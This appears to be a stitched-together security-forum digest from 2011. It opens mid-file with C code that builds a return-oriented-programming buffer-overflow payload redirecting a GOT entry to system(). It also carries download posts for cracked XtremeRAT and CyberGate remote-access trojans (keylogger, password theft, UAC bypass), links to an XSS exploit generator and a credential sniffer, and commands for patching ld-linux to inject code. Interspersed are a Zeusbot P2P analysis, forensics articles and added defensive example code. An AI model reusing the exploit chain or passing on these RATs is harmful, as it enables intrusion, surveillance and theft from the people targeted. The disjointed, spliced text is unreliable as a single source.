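    out[pos] = v & 0xFF; out[pos + 1] = (v >> 8) & 0xFF;
    out[pos + 2] = (v >> 16) & 0xFF; out[pos + 3] = v >> 24;
    return pos + 4;
}

/* argv[1] exactly as the post lays it out: 268 bytes of 'A', then the chain. */
size_t build_payload(uint8_t *out, size_t cap)
{
    const struct chain_values v = compute_chain_values();
    const uint32_t chain[] = {
        G1_POP_EBX_EBP, v.ebx_dummy, v.eax_seed,   /* ebx = dummy, ebp = seed */
        G2_XCHG_ADD,                                /* eax = seed + 8, harmless add into __gmon_start__ slot */
        G1_POP_EBX_EBP, v.ebx_real, 0x41414141u,    /* ebx = real, ebp = "AAAA" */
        G3_ADD_EAX_MEM,                             /* eax += GOT[strcpy]  ->  system() */
        0x45564f4du, 0x50504f50u, 0x50504f50u,      /* "MOVE" eaten by add esp,4; "POPP","POPP" popped */
        G4_CALL_EAX, STR_GNU,                       /* call pushes a return slot, so "GNU" is system()'s argument */
    };
    const size_t len = RET_OFFSET + sizeof chain;
    size_t pos = RET_OFFSET;
    if (cap < len) return 0;
    memset(out, 'A', RET_OFFSET);
    for (size_t i = 0; i < sizeof chain / sizeof chain[0]; i++) pos = put32(out, pos, chain[i]);
    return len;
}

static uint8_t g_payload[512];
size_t demo_payload_length(void) { return build_payload(g_payload, sizeof g_payload); }
int demo_payload_byte(size_t i) { return i < demo_payload_length() ? g_payload[i] : -1; }

int main(void)
{
    const struct chain_values v = compute_chain_values();
    printf("ebx dummy %08x, eax seed %08x, ebx real %08x\n", v.ebx_dummy, v.eax_seed, v.ebx_real);
    printf("strcpy at b7e72ea0 (made-up base): eax before call = %08x\n", simulate_eax(0xb7e72ea0u));
    printf("payload length: %zu bytes\n", demo_payload_length());
    return 0;
}
```

The dry run is the check worth keeping: if either displacement were off by one, the dummy write would land on the wrong GOT slot or the read would fetch the wrong function, and the first sign would be a crash in the target rather than a wrong number on a terminal.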
-
Cross Context Scripting with Firefox
Roberto Suggi Liverani, Senior Security Consultant, Security-Assessment.com
21 April 2010
Contents:
Abstract
1. Introduction
1.1 XPCOM Component Model
1.2 XUL
1.3 Chrome
1.4 XBL - Custom tags
1.5 XUL Overlay
1.6 Themes, Skins and Locales
2. XCS Cases
2.1 Case I: XCS via Event Handlers – Drag and Drop
2.2 Case II: Attacking Custom DOM event handlers
2.3 Case III: Cross Domain Content/Script Include
2.4 Case IV: Injection via XBL
2.5 Case V: Attacking Wrappers
2.6 Case VI: Attacking XPCOM Components
2.7 Case VII: Sandbox Chrome Leakage
2.8 Case VIII: Bypassing nsIScriptableUnescapeHTML.parseFragment()
3. Conclusion
4. References
Download:
http://security-assessment.com/files/documents/whitepapers/Cross_Context_Scripting_with_Firefox.pdf
http://security-assessment.com/files/documents/whitepapers/Exploiting_Cross_Context_Scripting_vulnerabilities_in_Firefox.pdf
-
GenXE - Generate XSS Exploit 0.9.0
Tool: Online Version / Download ZIP Version / Forum / SourceForge Project Homepage
Admin: LiuDieYu <liudieyuinchina@vip.sina.com>
Related links: http://crosszone.org http://umbrella.mx.tc
Source: http://genxe.sourceforge.net/
-
[h=3]0x375 – 0x07 – Security Considerations for a brave new (IPv6) World[/h]
28/11/2011
I finally had the chance to present something at the Thessaloniki Tech Talk Sessions, also known as 0x375. The people over there have done a great job, and I truly mean that, bringing tech people together. Almost once a month 2 speakers can present a tech topic they like at an open auditorium inside the Aristotle University of Thessaloniki. On those events people from Thessaloniki, but also from nearby cities, gather and have a great time, not only during the presentations but afterwards as well. I won't spoil the events that take place during the tech talks, because you should definitely go if you are curious, but I can tell you that it's not uncommon for as many as 15 to 20 people to go for beers after the talks! So, the past Friday (25/11/2011), me and @apoikos traveled from Athens to Thessaloniki to present at 0x375. My presentation was about some security concepts on IPv6 networks, how old attacks of the IPv4 world transform to new ones on the IPv6 world and about some new ones that will appear on local networks sooner or later. I also had prepared some small live demos, but as always it's very hard to succeed in a live demo if you don't quite control the environment. At least some of the stuff I wanted to show were successful, and I'm happy with those. (Thanks to Nuclear for booting his OS X guinea pig)
Some apologies... When giving a presentation on IPv6, in an event that has no other introductory IPv6 presentations, I always face the same problem: most people are not very well aware of how different this protocol is from IPv4. When I ask the audience how well do they know IPv6, most people are embarrassed to say they have never actually used it, so the audience stays very, VERY silent. This means that I have to put around 15-20 slides to make a "quick introduction to IPv6", and this unfortunately usually takes over 30′ of presentation time. Some techy/advanced people might be bored with this, but there's no other way to overcome this "issue". If you go straight to the point and start discussing ND ICMPv6 messages most people won't be able to keep up... so I'm sorry if I made some of the audience get bored by my first slides. I promise that my next talk on 0x375, cause there will surely be a next one, will be less boring for you. Thank you all for coming there, I hope you enjoyed it as much as I did!
You can find the slides and my live demo notes here:
Download: 0x375 – 0x07 – kargig – Security Considerations for a brave new (IPv6) World (pdf)
0x375 – 0x07 – kargig – Security Considerations for a brave new (IPv6) World – live demo notes (txt)
P.S. I've started collecting some interesting (for me) presentations regarding IPv6 topics at void.gr/kargig/ipv6/. Check them out if you like.
Source: http://www.void.gr/kargig/blog/2011/11/28/0x375-0x07-security-considerations-for-a-brave-new-ipv6-world/
-
Intercepter-NG New Sniffing Tool
Intercepter-NG offers the following features:
+ Sniffing passwords\hashes of the types: ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE
+ Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\IRC\MRA
+ Promiscuous-mode\ARP\DHCP\Gateway\Smart Scanning
+ Raw mode (with pcap filter)
+ eXtreme mode
+ Capturing packets and post-capture (offline) analyzing
+ Remote traffic capturing via RPCAP daemon
+ NAT
+ ARP MiTM
+ DNS over ICMP MiTM
+ DHCP MiTM
+ SSL MiTM
+ SSL Strip
Works on Windows NT (2K\XP\2k3\Vista\7).
Download: http://intercepter.nerf.ru/Intercepter-NG.v09.zip
Source: http://thehackernews.com/2011/11/intercepter-ng-new-sniffing-tool.html
-
Attacking NFC Mobile Phones
Collin Mulliner, Fraunhofer SIT
EUSecWest, May 2008, London, UK
A first look at NFC Phone Security: Some Tools, PoCs, and a Small Survey

Agenda
- Introduction to NFC
- NFC phones and data formats
- An NFC Security Toolkit
- Analyzing an NFC Mobile Phone
- Attacking NFC services in the field - a survey
- Notes from the lab
- Conclusions

Download: http://mulliner.org/nfc/feed/collin_mulliner_eusecwest08_attacking_nfc_phones.pdf
-
[h=1]Cracking into the New P2P Variant of Zeusbot/Spyeye[/h]
Created: 28 Nov 2011
Andrea Lelli

Recently, Symantec observed a modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient.

(Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.)

To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server.

Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime.

Here's how it works:

When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data. To initiate a communication the bot sends out a “portknocking” data packet that contains a header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines. More UDP packets may follow the portknocking, exchanging different data (the purpose of which is still under investigation).

Figure 1: Communication

When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive either a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server. Interestingly, the SHA-1 of the infected machine is not communicated at this stage (in our tests it was not sent to the C&C at any time). This may mean the C&C server is not involved in controlling the peers (e.g. collecting of all SHA-1 and updating the list of available peers) and therefore the P2P network would be completely autonomous.

We have found several samples in the wild which all seem to originate from a single source. These samples are all packed with the same techniques, and the binary code of the unpacked virus is almost identical (differing in only the smallest of details). This leads us to believe these samples are coming from the same source code, but are recompiled with small changes. We suspect those responsible for spreading this new variant may have access to the source code and upgraded the bot with all the new features. Our samples also all shared the same RC4 substitution box used to decrypt configuration data and we also ran some different random samples and the configuration data they downloaded is similar in all cases. All these details indicate this Trojan seems to be a private build from those who had access to source code and want to target specific websites (lots of Italian ones).

We first observed this threat on September 13, 2011. This date also matches the time-date stamp of the first samples found, when we believe the variant started spreading. At the time of writing this blog, the threat does not seem prevalent with only a limited number of samples in the wild (this may change in time, of course). This does not mean the botnet is dead: the P2P network is alive and we have decoded the latest data from the configuration files which contains the frequently updated C&C server address (the C&C server is currently active using a November-registered domain name). In total we observed 327 unique peers, so an estimation of the number of infected machines could be anywhere from 500 to 1000.

Figure 2: Infection geographical distribution

The modified variant of Zeusbot/Spyeye which uses a P2P network is indeed an improvement, but comes with drawbacks as well. The communication protocol lacks proper authentication so a rogue client may connect to the network and communicate with peers. The configuration file is not authenticated, since it is encrypted with a symmetric algorithm, meaning a rogue configuration file would be easy to forge. Any infected client can become part of the list of peers actively exchanged by the drones. A rogue client may infiltrate the P2P network, forge a rogue certificate, and distribute it to other bots—which means the rogue would be able to specify a new C&C server and hijack the entire network.

At this stage we cannot tell if this variant will become a mainstream implementation of the bot or simply die off. We will keep an eye on it in order to detect all new variants. It has been reported that this threat has been spreading through spam emails and drive-by download exploits, so, in order to mitigate the risk of infection, we recommend users keep their computers updated and beware of email from unknown or unverified sources.

Additional details from the analysis are available to our DeepSight subscribers.

Source: http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye
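The post's key design observation is that the configuration file is encrypted with a symmetric cipher (RC4) but never authenticated, so a modified file decrypts "successfully". The following added example (written for this post, not code from Symantec or from the bot) makes that distinction concrete: a toy RC4 decryptor accepts a ciphertext with one flipped byte without any sign of trouble, while an encrypt-then-MAC layer rejects it. All keys and the sample config string are constructed for the demonstration.

```python
import hashlib
import hmac

# Constructed keys and config for the demonstration only; nothing here is
# taken from the bot's real key material or configuration format.
ENC_KEY = b"constructed-rc4-key"
MAC_KEY = b"constructed-mac-key"
SAMPLE_CONFIG = b"cnc=http://c2.example.invalid/gate.php;version=1"


def rc4(key: bytes, data: bytes) -> bytes:
    """Minimal RC4 (KSA + PRGA). Included only because the post names RC4;
    it is a broken cipher and not a recommendation for new designs."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_unauthenticated(blob: bytes) -> bytes:
    """The design the post describes: decrypt and trust the result.
    RC4 is a stream cipher, so decryption is the same operation as encryption."""
    return rc4(ENC_KEY, blob)


def seal(config: bytes) -> bytes:
    """Encrypt-then-MAC: the tag is computed over the ciphertext, so any
    modification of the blob is detectable before decryption."""
    ct = rc4(ENC_KEY, config)
    return ct + hmac.new(MAC_KEY, ct, hashlib.sha256).digest()


def open_sealed(blob: bytes):
    """Return the config only if the tag verifies; None otherwise."""
    ct, tag = blob[:-32], blob[-32:]
    expected = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return rc4(ENC_KEY, ct)


def demo():
    """Flip one ciphertext byte and compare how both designs react."""
    plain_ct = rc4(ENC_KEY, SAMPLE_CONFIG)
    corrupted = bytearray(plain_ct)
    corrupted[4] ^= 0x01
    # A stream cipher maps a one-byte ciphertext change to a one-byte
    # plaintext change; the decryptor has no way to notice.
    garbled = decrypt_unauthenticated(bytes(corrupted))
    changed = sum(a != b for a, b in zip(garbled, SAMPLE_CONFIG))

    sealed = seal(SAMPLE_CONFIG)
    sealed_corrupted = bytearray(sealed)
    sealed_corrupted[4] ^= 0x01
    return {
        "unauth_changed_bytes": changed,                 # 1
        "unauth_same_length": len(garbled) == len(SAMPLE_CONFIG),
        "sealed_intact": open_sealed(sealed),            # == SAMPLE_CONFIG
        "sealed_tampered": open_sealed(bytes(sealed_corrupted)),  # None
    }


if __name__ == "__main__":
    print(demo())
```

A shared MAC key embedded in every peer can of course be recovered from any one of them, so a channel like this one would need a public-key signature (only the public key ships with the client) rather than an HMAC; HMAC is used here because it is in the standard library and is enough to show the difference between "encrypted" and "authenticated".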
-
ld-linux.so ELF hooker

Stéphane and myself are releasing a new tool injecting code at runtime, just between the ELF loader and target binary. It is an alternative to LD_PRELOAD, just a little bit more intrusive but 100% reliable. Sources were released on Github.

When a binary is execve()'d, the kernel extracts from the ELF headers the interpreter to be launched, usually /lib/ld-linux.so.2. The kernel creates a new process and prepares the environment (arguments and auxiliary data). The target ELF entry point is set in an auxiliary vector of type "ENTRY". Then the kernel opens the requested interpreter, maps the memory regions and starts its execution at ld's ELF entry point. Then the loader analyzes the target ELF file, performs its loader work and sets EIP to the target ELF entry point (extracted from auxv). At this point, the program's main() is eventually executed.

Our goal was to permit the execution of code for an arbitrary dynamically linked binary without patching each of them. So our interest moved to the loader, the common point between most executables. Thus, we decided to patch a normal ld in order to inject code. My awesome colleague, Stéphane Duverger (the ramooflax author!) and myself wrote ld-shatner. Its task is to patch the ld-linux.so file accordingly:

- After the ELF header, we shift the "ELF program header" a few pages away
- In this new section, we inject a "loader routine" (hooked.s) and embedded code to be executed at runtime
- After having been saved in our section, ld's ELF entry point is overwritten to jump directly to our routine. This routine extracts from the auxiliary vectors the target ELF entry point and overwrites it with a pointer to our embedded code (func() in the payload).
- The original ld entry point is called and ld works as usual
- Eventually, it calls the entry point set in the auxiliary vector (which was replaced by a pointer to our payload)
- Embedded code runs
- It returns to our routine which finally jumps to the original target entry point

Some pictures before/after ld-shatner voodoo:
(Figure: ld-shatner voodoo)

Screenshot
$ make clean all
$ cp /lib/ld-linux.so.2 /bin/ls .
$ ./ld-shatner ld-linux.so.2 obj.elf
$ sudo cp ld-hook.so /lib/
$ ./interpatch ls
$ ./ls
ld-hook <---------------------- output of obj.elf
[...]
(Ok, we cheat for the moment because we have to patch the ls binary but we will not have to do that eventually)

So what?
My ultimate goal for ld-shatner is to use this method for starting applications in my sandbox project, seccomp-nurse. For the moment, I rely on the LD_PRELOAD feature but this approach is... hackish and I have to work around some bugs because of this special context...

Source: http://justanothergeek.chdir.org/2011/11/ld-linuxso-elf-hooker.html
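The hook works by rewriting the AT_ENTRY slot of the auxiliary vector, which the kernel filled in from the target's ELF header. That gives a simple runtime integrity check from the other side: a process can read its own auxv and compare AT_ENTRY with what the on-disk header predicts. The following added example (not part of ld-shatner) does that in Python; it assumes Linux procfs (/proc/self/exe, /proc/self/auxv) and a little-endian ELF, and recovers the PIE load base from AT_PHDR together with the PT_LOAD segment that contains the program header table.

```python
import struct

# Auxiliary-vector tags as defined in <elf.h> on Linux.
AT_NULL, AT_PHDR, AT_ENTRY = 0, 3, 9
PT_LOAD = 1


def parse_elf(path):
    """Read an ELF executable and return (is64, e_entry, e_phoff, phdrs),
    where phdrs is a list of (p_type, p_offset, p_vaddr, p_filesz)."""
    with open(path, "rb") as f:
        data = f.read()
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("not a little-endian ELF file (the only kind handled here)")
    is64 = data[4] == 2
    if is64:
        e_entry, e_phoff = struct.unpack_from("<QQ", data, 0x18)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    else:
        e_entry, e_phoff = struct.unpack_from("<II", data, 0x18)
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x2A)
    phdrs = []
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, _flags, p_offset, p_vaddr, _paddr, p_filesz = struct.unpack_from("<IIQQQQ", data, off)
        else:
            p_type, p_offset, p_vaddr, _paddr, p_filesz = struct.unpack_from("<IIIII", data, off)
        phdrs.append((p_type, p_offset, p_vaddr, p_filesz))
    return is64, e_entry, e_phoff, phdrs


def read_auxv(path, is64):
    """Parse the (tag, value) pairs the kernel placed on the initial stack."""
    fmt = "<QQ" if is64 else "<II"
    step = struct.calcsize(fmt)
    with open(path, "rb") as f:
        raw = f.read()
    aux = {}
    for off in range(0, len(raw) - step + 1, step):
        tag, val = struct.unpack_from(fmt, raw, off)
        if tag == AT_NULL:
            break
        aux[tag] = val
    return aux


def expected_entry(e_entry, e_phoff, phdrs, at_phdr):
    """Where the entry point should be at runtime: the file's e_entry plus the
    load base. The base is recovered from AT_PHDR (runtime address of the
    program header table) and the PT_LOAD segment that contains that table;
    for a non-PIE binary the base works out to zero."""
    for p_type, p_offset, p_vaddr, p_filesz in phdrs:
        if p_type == PT_LOAD and p_offset <= e_phoff < p_offset + p_filesz:
            phdr_vaddr = p_vaddr + (e_phoff - p_offset)
            return at_phdr - phdr_vaddr + e_entry
    raise ValueError("program header table is not inside any PT_LOAD segment")


def entry_point_consistent(exe="/proc/self/exe", auxv="/proc/self/auxv"):
    """True when AT_ENTRY matches what the on-disk ELF header predicts."""
    is64, e_entry, e_phoff, phdrs = parse_elf(exe)
    aux = read_auxv(auxv, is64)
    return aux[AT_ENTRY] == expected_entry(e_entry, e_phoff, phdrs, aux[AT_PHDR])


if __name__ == "__main__":
    print("AT_ENTRY consistent with ELF header:", entry_point_consistent())
```

The check only sees what the kernel (or a patched loader) left in the auxiliary vector, so a hook that restores the original AT_ENTRY after running its payload would pass it; it is a cheap consistency test, not proof that the loader is unmodified.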
-
[h=5]XtremeRATv3.2 Cracked Version[/h]
November 27, 2011, 06:28:40 pm

I haven't tried it, I don't know if it's infected, I'm not responsible for anything.

Version 3.2 Changes:
- Corrected webcam problems.
- Corrected error when close the control center window and the webcam, desktop capture or audio are opened.
- Added option to resize the desktop preview image.
- Copy and Paste functions was added in filemanager.
- Options to get a preview image of an selected window was added.
- Added password protection to your settings.
- Added new skins.
- Added a possibility to rename files when download files with same name.
- Added a CheckBox to update desktop preview images only of the selected servers. This will reduce network traffic.
- Corrected an error in mouselogger that don't save all clicks.
- Mouselogger corrected on client side.
- Added option to select windows always on top.
- Added notification when server disconnect.
- Was corrected the function that show all flags from servers.
- Connectir public von limit foersions (only 100000000000000000000000000000000 servers)

DOWNLOAD: http://www.multiupload.com/3EDV3BCDQ0
Source: udtools.net
Source: http://www.underc0de.org/foro/index.php?topic=8249.msg29369
-
[h=5]CyberGate 1.18 Cracked Version[/h]
November 27, 2011, 06:30:13 pm

I haven't tested it, I don't know if it's infected, I'm not responsible for anything.

- Reverse connection Remote Administration Tool.
- BaseCode64, Xor, RC4 and AES traffic encryption (depends on features, etc ... Obviously they do not use same encryption ciphers due to application stability and performance. Some ciphers would make this software a lot slower and unstable if used for certain features)
- Language support
- View options
- Multi port support
- Remote connection search option
- Injection option to create new servers
- Anti debugging options to create new server
- Startup methods option to create new server
- Password protection method to create new server
- Optional binder option to create new server
- Icon changer option to create new server
- Delayed execution option to create new server
- Customizable installation folder and file name to create new server
- Ftp logs support
- Automatic DNS updater
- Multi profiles builder
- UAC (Vista and Seven protection) bypass on server
- Keylogger option
- Password recovery tool (browser, msn, windows ...)
- Very light stub (~265kb)
- Chat feature
- File manager
- Registry editor
- Services manager
- Windows manager
- Processes manager
- Clipboard manager
- Socks 4/5 Proxy
- Http Proxy
- Mass features
- Installed programs manager
- Remote desktop (with capture)
- Remote webcam view (with capture)
- Capture audio
- Remote download and execute
- DOS prompt
- Send message boxes
- Control desktop items (taskbar, icon, start menu)
- Active ports list
- Server control (update, disconnect, restart)
- Remote open HTTP URL
- Send file and execute
- CD Open and Close
- Reverse Mouse Option
- Remote Power Options (Shutdown, Restart, etc ...)
- Remote Mouse Lock
- Remote Keyboard Lock
- Remote Icons Hide/show
- Remote Start Hide/show
- Group support (connections can be organized in groups)
- Several function that can be performed from group panel
- URL visiter (with hidden feature)
- VBscript console
- Multi-user keylogger/file search
- Local file erases tool (erase files beyond recovery)
- Local startup manager tool
- Startup manager
- Programs assist
- Connection log incorporated in the client GUI
- CyberGate has task managers for client and server on connecting
- Task logs
- Add Notes for your connections if you want
- Multiple tabs in the client making your life easier (connections tab, group panel tab, client tasks tab, etc ...)
- Automatically map ports if your router supports uPnP
- GeoIP server tracking for accurate remote computer localization tracking
- Easy search function on password recovery tool
- Thumbnails view on file manager allowing display all images of a remote folder
- Lock station (ability to lock CyberGate after a certain time of idling or by button press to avoid outsiders from accessing your CyberGate client)
- Webloader (a webdownloader with 3.5 Kb)
- Windows OS bit system (x32/x64)
- Recoded webcam capture
- Recoded password recovery
- Run remote files as admin
- More then 70 skins to choose from

DOWNLOAD: http://www.multiupload.com/GEMQNJOKD0
Original forum post: http://www.hackforums.net/showthread.php?tid=1906067
Source: CyberGate 1.18 Cracked Version
-
File Carving!
By Christiaan Beek.

'File Carving', or sometimes simply "carving", is the process of extracting a collection of data from a larger data set. Data carving techniques frequently occur during a digital investigation when the unallocated file system space is analyzed to extract files. There are many carving techniques and tools available that can be used to investigate disk/removable-media images. For example after many years, an update of the famous carving tool 'Scalpel' was just released. However these tools are not by default useful when investigating a dump from a cell-phone because every mobile-phone vendor has its own way for storing data into the phone memory. There's even a difference between the phone models. A different approach and development of tools is necessary. For reading more about file carving basics, techniques and challenges, read my new whitepaper:

Download: http://www.mcafee.com/us/resources/white-papers/foundstone/wp-intro-to-file-carving.pdf
Source: Introduction to File Carving! via reddit.com
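The basic carving technique the post refers to (the one Scalpel and foremost implement over unallocated space) is header/footer carving: scan a raw buffer for known magic numbers, then cut from each header to the matching footer, bounded by a maximum file size. The following added example (not from the whitepaper or from Scalpel) implements that over a small constructed "disk image" containing a complete JPEG, a complete PNG, and a JPEG whose footer is missing, so it also shows the truncated-file case. The signature table and the three embedded samples are constructed for the demonstration; the magic numbers themselves are the standard ones.

```python
# Signature table: (label, header, footer). Only two well-known formats are
# listed here; a real carver carries many more, usually from a config file.
SIGNATURES = [
    ("jpg", b"\xff\xd8\xff", b"\xff\xd9"),
    ("png", b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82"),
]

# Constructed sample "files" and a constructed image made of filler bytes
# around them. The third file has a header but no footer (truncated).
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"constructed-jpeg-body" + b"\xff\xd9"
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"constructed-png-chunks" + b"IEND\xae\x42\x60\x82"
TRUNCATED_JPEG = b"\xff\xd8\xff\xe1" + b"truncated-no-footer"
DISK_IMAGE = (b"\x00" * 100 + JPEG_SAMPLE + b"\x11" * 50 + PNG_SAMPLE
              + b"\x22" * 30 + TRUNCATED_JPEG)


def carve(data: bytes, max_size: int = 64):
    """Header/footer carving over an unstructured byte buffer.

    For every header hit the footer is searched within max_size bytes. If it
    is absent (truncated or partially overwritten file) the carver keeps up to
    max_size bytes and marks the hit incomplete, the usual carver behaviour.
    Scanning resumes right after each header rather than after the carved
    region, so overlapping or nested candidates are not lost."""
    hits = []
    for label, header, footer in SIGNATURES:
        start = data.find(header)
        while start != -1:
            window_end = min(len(data), start + max_size)
            # find(sub, lo, hi) only matches a footer lying wholly inside the window
            foot = data.find(footer, start + len(header), window_end)
            if foot != -1:
                end, complete = foot + len(footer), True
            else:
                end, complete = window_end, False
            hits.append({"type": label, "offset": start, "length": end - start,
                         "complete": complete, "data": data[start:end]})
            start = data.find(header, start + len(header))
    hits.sort(key=lambda h: h["offset"])
    return hits


if __name__ == "__main__":
    for hit in carve(DISK_IMAGE):
        print(f"{hit['type']} at offset {hit['offset']}, {hit['length']} bytes, "
              f"{'complete' if hit['complete'] else 'no footer found'}")
```

The max_size bound matters in both directions: too small cuts real files short, too large lets a missing footer swallow whatever follows, which is why carving tools expose it per signature.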
-
[h=1]Windows shellbag forensics[/h]

Microsoft Windows uses a set of Registry keys known as "shellbags" to maintain the size, view, icon, and position of a folder when using Explorer. These keys are useful to a forensic investigator. Shellbags persist information for directories even after the directory is removed, which means that they can be used to enumerate past mounted volumes, deleted files, and user actions.

Yuandong Zhu, Pavel Gladyshev, and Joshua James provided a nice overview of the investigative value of shellbags in "Using shellbag information to reconstruct user activities" [pdf]; however, they do not describe how to programmatically access the data. Allan S Hay went into greater detail in his December, 2004 document "MiTeC Registry Analyser" [pdf], although he also leaves out a thorough analysis of the format. TZWorks provides an effective closed-source shellbag parser sbag, but does not explain its algorithm. Yogesh Khatri first described the basic structure of Windows Shell Items in his blog post for 42 LLC entitled Shell BAG Format Analysis. Joachim Metz went on to describe the binary format of the Windows Shell Item structures in great detail in Windows Shell Item format specification [pdf]. This page documents an approach to parsing shellbags in detail, as well as introduces an open-source, cross-platform shellbag parser.

[h=2]Shellbag locations[/h]
Shellbags may be found in a few locations, depending on operating system version and user profile. On a Windows XP system, shellbags may be found under:
HKEY_USERS\{USERID}\Software\Microsoft\Windows\Shell\
HKEY_USERS\{USERID}\Software\Microsoft\Windows\ShellNoRoam\
The NTUser.dat hive file persists the Registry key HKEY_USERS\{USERID}\.

On a Windows 7 system, shellbags may be found under:
HKEY_USERS\{USERID}\Local Settings\Software\Microsoft\Windows\Shell\
The UsrClass.dat hive file persists the registry key HKEY_USERS\{USERID}\.

[h=2]Shellbag Parsing[/h]
Let us begin with the Shell\ key.
The Shell\ key does not have any values. Under the Shell\ key are two keys: Shell\Bags\ and Shell\BagMRU\.

[h=3]FolderData[/h]
Each subkey under Shell\Bags\ is named as increasing integers from one, such as Shell\Bags\1\ or Shell\Bags\2\. Let us call these subkeys FolderData, since they each represent one item viewed in Explorer, and this is usually a folder. FolderData subkeys do not have any values, but often have subkeys. The most common subkey is Shell\Bags\{Int}\Shell\, but there are a few other possibilities (ComDlg, Desktop, etc.). The subkeys under a FolderData describe the settings, position, and icon when viewing the folder in Explorer. In particular, a Registry value whose name begins with ItemPos specifies the location of the icons for a given desktop resolution.

For example, on my Windows 7 system, the Registry key HKEY_USERS\{USERID}\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} has 12 values that record various configurations. This set includes the value ItemPos1427x820(1) that has type REG_BIN with length 0x120:

0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 15 00 00 00 51 00 00 00 14 00 1F 60 40 F0 5F 64 ....Q......`@._d
0020 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 .P......./.N....
0030 A0 00 00 00 46 00 3A 00 02 02 00 00 10 3D 0C 8E ....F.:......=..
0040 20 00 43 79 67 77 69 6E 2E 6C 6E 6B 00 00 2C 00 .Cygwin.lnk..,.
0050 03 00 04 00 EF BE 10 3D 0C 8E 10 3D 0C 8E 14 00 .......=...=....
0060 00 00 43 00 79 00 67 00 77 00 69 00 6E 00 2E 00 ..C.y.g.w.i.n...
0070 6C 00 6E 00 6B 00 00 00 1A 00 15 00 00 00 02 00 l.n.k...........
0080 00 00 5A 00 3A 00 42 06 00 00 10 3D 91 7C 20 00 ..Z.:.B....=.| .
0090 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 MOZILL~1.LNK..>.
00A0 03 00 04 00 EF BE 10 3D 91 7C 10 3D 61 85 14 00 .......=.|.=a...
00B0 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 ..M.o.z.i.l.l.a.
00C0 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 .F.i.r.e.f.o.x.
00D0 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 41 01 00 00 ..l.n.k.....A...
00E0 51 00 00 00 30 00 31 00 00 00 00 00 10 3D 2C 81 Q...0.1......=,.
00F0 10 00 4D 49 52 00 1E 00 03 00 04 00 EF BE 10 3D ..MIR..........=
0100 B0 80 10 3D A7 8C 14 00 00 00 4D 00 49 00 52 00 ...=......M.I.R.
0110 00 00 12 00 41 01 00 00 51 00 00 00 00 00 00 00 ....A...Q.......

With no tools beyond Regedit (or Regview.py), Windows 8.3 filenames (eg. MOZILL~1.LNK) and Unicode filenames (eg. Mozilla Firefox.lnk) stand out. Fortunately, by applying the formats found in Joachim's paper, more details can be extracted. Throughout this document, I refer to this Registry value type as an ITEMPOS value.

[h=3]ITEMPOS values[/h]
The ITEMPOS value's structure is a list of Windows File Entry Shell Items (SHITEM_FILEENTRY) terminated by an entry whose size field is zero. The list begins at offset 0x10. Items are preceded by 0x8 bytes whose meaning is unknown. The minimum size of a SHITEM_FILEENTRY structure is 0x15 bytes, so entries whose size field is less than 0x15 should be skipped.
The valid SHITEM_FILEENTRY items have the following structure (in pseudo-C / 010 Editor template format):

typedef struct SHITEM_FILEENTRY {
    UINT16 size;
    UINT16 flags;
    UINT32 filesize;
    DOSDATE date;
